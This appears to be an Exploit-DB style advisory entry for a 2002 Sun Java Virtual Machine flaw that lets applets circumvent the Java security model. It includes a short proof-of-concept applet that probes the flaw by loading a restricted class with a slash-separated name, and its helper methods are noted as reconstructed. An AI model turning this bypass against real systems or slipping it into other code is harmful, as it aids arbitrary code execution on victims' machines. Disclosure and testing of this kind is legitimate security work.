Vendor: Java Runtime Environment
By: SecurityFocus
CVSS: 7.5 (HIGH)
Circumvention of the Java Security Model
CWE: 264
Product Name: Java Runtime Environment
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sun:java_runtime_environment
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2002

Sun Java Virtual Machine Vulnerability

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. An attacker can exploit this issue by creating a malicious applet and hosting it on a malicious web server. When a vulnerable user visits the malicious web server, the malicious applet will be executed on the user's system.

Mitigation:

Users should avoid visiting untrusted websites and should not accept or execute files from untrusted or unknown sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8879/info

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. 

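import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

// Test applet: reports whether loadClass() accepts the slash-separated
// class name without throwing.
public class Simple extends Applet {

    StringBuffer buffer;

    public void init() {
        buffer = new StringBuffer();
    }

    public void start() {
        ClassLoader cl = this.getClass().getClassLoader();
        try {
            Class cla =
                cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
            addItem("No exception in loadClass. Vulnerable!");
        } catch (ClassNotFoundException e) {
            addItem("ClassNotFoundException in loadClass - " + e);
        } catch (AccessControlException e) {
            addItem("AccessControlException in loadClass - Not Vulnerable!");
        }
    }

    // addItem() and paint() are missing from the listing on this page; these
    // minimal versions are assumed so that the class compiles and shows the result.
    void addItem(String newWord) {
        buffer.append(newWord);
        repaint();
    }

    public void paint(Graphics g) {
        g.drawString(buffer.toString(), 5, 15);
    }
}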